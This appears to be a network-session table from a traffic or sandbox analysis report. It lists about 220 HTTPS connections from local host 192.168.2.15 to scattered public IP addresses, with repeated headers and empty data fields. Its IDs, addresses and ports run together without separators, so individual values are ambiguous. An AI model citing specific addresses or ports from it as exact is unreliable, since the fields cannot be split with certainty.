                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14302192.168.2.153806882.28.156.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14303192.168.2.154659045.59.15.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14304192.168.2.154055013.232.254.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14305192.168.2.15598669.141.244.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14306192.168.2.1543704171.4.71.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14307192.168.2.1554298217.187.204.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14308192.168.2.1534716148.76.125.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14309192.168.2.1541600219.154.232.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14310192.168.2.1559274210.228.164.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14311192.168.2.155112452.83.7.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14312192.168.2.153914688.79.19.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14313192.168.2.153725241.43.122.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14314192.168.2.15574181.171.32.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14315192.168.2.153550050.230.222.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14316192.168.2.154985817.68.175.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14317192.168.2.1558560196.118.240.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14318192.168.2.156083641.131.34.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14319192.168.2.154299434.109.219.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14320192.168.2.1554564120.86.135.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14321192.168.2.1552186184.206.81.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14322192.168.2.1557900186.214.55.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14323192.168.2.1550968211.229.228.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14324192.168.2.153691240.152.47.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14325192.168.2.1545126137.242.109.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14326192.168.2.1550136168.224.50.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14327192.168.2.1537518201.177.134.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14328192.168.2.1542096111.121.145.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14329192.168.2.154826419.82.87.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14330192.168.2.1537166201.207.121.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14331192.168.2.1539192105.98.93.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14332192.168.2.1557900151.37.246.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14333192.168.2.1549484213.56.51.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14334192.168.2.154374276.197.28.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14335192.168.2.1538452143.176.39.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14336192.168.2.1536614147.171.127.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14337192.168.2.1548740146.12.252.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14338192.168.2.154242050.132.175.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14339192.168.2.154815093.39.231.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14340192.168.2.1547896181.60.197.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14341192.168.2.155448475.134.166.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14342192.168.2.15489142.142.131.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14343192.168.2.1537562212.149.109.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14344192.168.2.153488247.37.132.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14345192.168.2.1537152141.197.145.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14346192.168.2.155041439.35.82.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14347192.168.2.1560586141.103.46.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14348192.168.2.154832480.163.198.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14349192.168.2.156076275.156.50.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14350192.168.2.1540308123.95.172.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14351192.168.2.1536740148.216.230.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14352192.168.2.1535944168.188.79.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14353192.168.2.1534436169.49.255.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14354192.168.2.154439034.132.24.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14355192.168.2.1552882212.240.218.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14356192.168.2.155653084.113.41.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14357192.168.2.1533820155.174.122.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14358192.168.2.15340449.37.181.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14359192.168.2.1558060108.128.147.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14360192.168.2.1546112105.207.158.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14361192.168.2.1559472165.206.29.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14362192.168.2.1537910137.0.184.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14363192.168.2.1537424168.248.36.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14364192.168.2.155597642.233.89.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14365192.168.2.1537354205.193.105.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14366192.168.2.154515466.216.95.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14367192.168.2.155134887.127.196.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14368192.168.2.1557968106.92.187.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14369192.168.2.154545631.227.67.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14370192.168.2.1538464146.249.139.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14371192.168.2.1548478208.254.93.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14372192.168.2.155053439.75.237.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14373192.168.2.15521042.91.112.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14374192.168.2.1557102182.17.227.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14375192.168.2.1554128167.183.16.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14376192.168.2.154290484.159.178.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14377192.168.2.153827241.156.203.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14378192.168.2.153518687.211.131.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14379192.168.2.1537338178.98.24.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14380192.168.2.1536394102.94.193.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14381192.168.2.154206477.179.126.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14382192.168.2.1555036181.52.120.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14383192.168.2.156076649.183.116.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14384192.168.2.1544680100.246.136.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14385192.168.2.1547172115.5.113.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14386192.168.2.154627283.231.62.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14387192.168.2.1535398148.59.192.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14388192.168.2.1537102132.101.249.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14389192.168.2.1545160107.204.29.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14390192.168.2.1557172223.213.28.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14391192.168.2.1557310156.246.25.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14392192.168.2.1543834147.87.204.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14393192.168.2.153729899.41.106.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14394192.168.2.1551128153.200.249.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14395192.168.2.1544380149.99.243.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14396192.168.2.156087613.199.114.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14397192.168.2.155654232.93.233.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14398192.168.2.1556000112.23.53.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14399192.168.2.154296499.150.213.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14400192.168.2.1537910154.84.240.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14401192.168.2.154436483.124.2.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14402192.168.2.155874843.25.11.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14403192.168.2.1554428119.126.15.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14404192.168.2.1556648100.8.136.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14405192.168.2.1548824187.216.209.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14406192.168.2.154225464.222.122.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14407192.168.2.1547766126.12.82.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14408192.168.2.1557220119.235.49.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14409192.168.2.155521899.230.47.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14410192.168.2.1538716213.137.157.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14411192.168.2.1535016135.240.18.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14412192.168.2.1539854199.98.127.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14413192.168.2.1541976116.122.62.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14414192.168.2.1555808103.177.121.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14415192.168.2.153951257.188.206.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14416192.168.2.1536916142.174.196.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14417192.168.2.1534902170.129.111.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14418192.168.2.15551248.182.106.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14419192.168.2.153666823.15.153.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14420192.168.2.155388444.205.34.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14421192.168.2.155122485.69.84.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14422192.168.2.154796235.17.71.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14423192.168.2.1547988128.159.184.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14424192.168.2.1544494137.172.113.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14425192.168.2.1536778101.101.210.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14426192.168.2.1556602197.250.17.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14427192.168.2.1546104152.73.107.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14428192.168.2.154343657.114.88.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14429192.168.2.1540718120.86.157.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14430192.168.2.1549670122.104.222.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14431192.168.2.1558478192.251.90.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14432192.168.2.156078831.7.155.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14433192.168.2.154957247.211.83.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14434192.168.2.155107857.103.12.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14435192.168.2.155964824.8.197.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14436192.168.2.1547958210.30.239.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14437192.168.2.1554146139.14.170.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14438192.168.2.1559830153.74.226.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14439192.168.2.1556992161.85.237.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14440192.168.2.155169696.252.164.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14441192.168.2.153934457.192.95.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14442192.168.2.155010020.45.15.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14443192.168.2.153938070.40.168.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14444192.168.2.155029240.19.167.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14445192.168.2.154373232.226.228.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14446192.168.2.1537620190.177.139.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14447192.168.2.154145267.100.207.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14448192.168.2.154814237.140.117.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14449192.168.2.1543382195.14.13.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14450192.168.2.1542806187.156.223.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14451192.168.2.154383457.254.50.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14452192.168.2.154819250.167.64.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14453192.168.2.1546982207.228.232.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14454192.168.2.154441072.31.179.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14455192.168.2.1544330191.250.85.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14456192.168.2.1537640150.136.75.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14457192.168.2.1555952197.87.42.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14458192.168.2.1557852137.201.41.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14459192.168.2.1559506203.49.118.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14460192.168.2.153593818.86.159.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14461192.168.2.155673285.132.3.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14462192.168.2.155515851.54.192.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14463192.168.2.155131045.116.24.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14464192.168.2.15365729.144.112.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14465192.168.2.155091075.253.112.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14466192.168.2.154636277.21.86.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14467192.168.2.154550886.28.16.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14468192.168.2.154798470.53.248.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14469192.168.2.153657836.166.245.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14470192.168.2.1542862148.99.146.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14471192.168.2.1545594144.143.47.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14472192.168.2.1547710143.248.64.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14473192.168.2.1553684145.169.151.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14474192.168.2.154557023.167.118.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14475192.168.2.153992636.56.210.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14476192.168.2.155412039.176.167.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14477192.168.2.1534718164.237.89.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14478192.168.2.1550280184.166.84.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14479192.168.2.155951025.193.146.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14480192.168.2.1554626121.156.53.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14481192.168.2.1559784189.17.91.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14482192.168.2.1533782190.111.38.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14483192.168.2.155035223.171.142.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14484192.168.2.155012847.8.184.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14485192.168.2.1560070155.191.243.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14486192.168.2.1558272160.177.29.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14487192.168.2.1546390139.54.221.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14488192.168.2.154979889.104.186.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14489192.168.2.15407589.23.30.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14490192.168.2.154716683.148.88.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14491192.168.2.1536222154.165.235.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14492192.168.2.155656423.34.248.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14493192.168.2.1543832121.74.22.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14494192.168.2.1559174154.185.8.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14495192.168.2.1544774177.21.88.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14496192.168.2.154049064.103.45.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14497192.168.2.15540545.69.163.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14498192.168.2.15481662.95.118.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14499192.168.2.155475661.129.210.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14500192.168.2.1548230129.98.109.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14501192.168.2.155279897.199.114.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14502192.168.2.1537272123.11.156.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14503192.168.2.1543750162.47.71.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14504192.168.2.155989461.2.251.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14505192.168.2.155142031.68.174.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14506192.168.2.1533374115.165.223.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14507192.168.2.1555942142.113.215.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14508192.168.2.1553388222.139.53.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14509192.168.2.155995493.34.62.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14510192.168.2.153991895.205.22.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14511192.168.2.1558572118.187.181.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14512192.168.2.1543144182.35.168.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14513192.168.2.15596624.193.234.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14514192.168.2.1556806166.240.4.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14515192.168.2.153469292.255.33.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14516192.168.2.153331071.127.163.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14517192.168.2.1548456220.194.163.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14518192.168.2.153897688.95.202.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14519192.168.2.155865681.67.142.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14520192.168.2.154177463.85.19.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14521192.168.2.153522485.41.240.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14522192.168.2.1556134219.189.7.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14523192.168.2.1544404200.22.72.180443
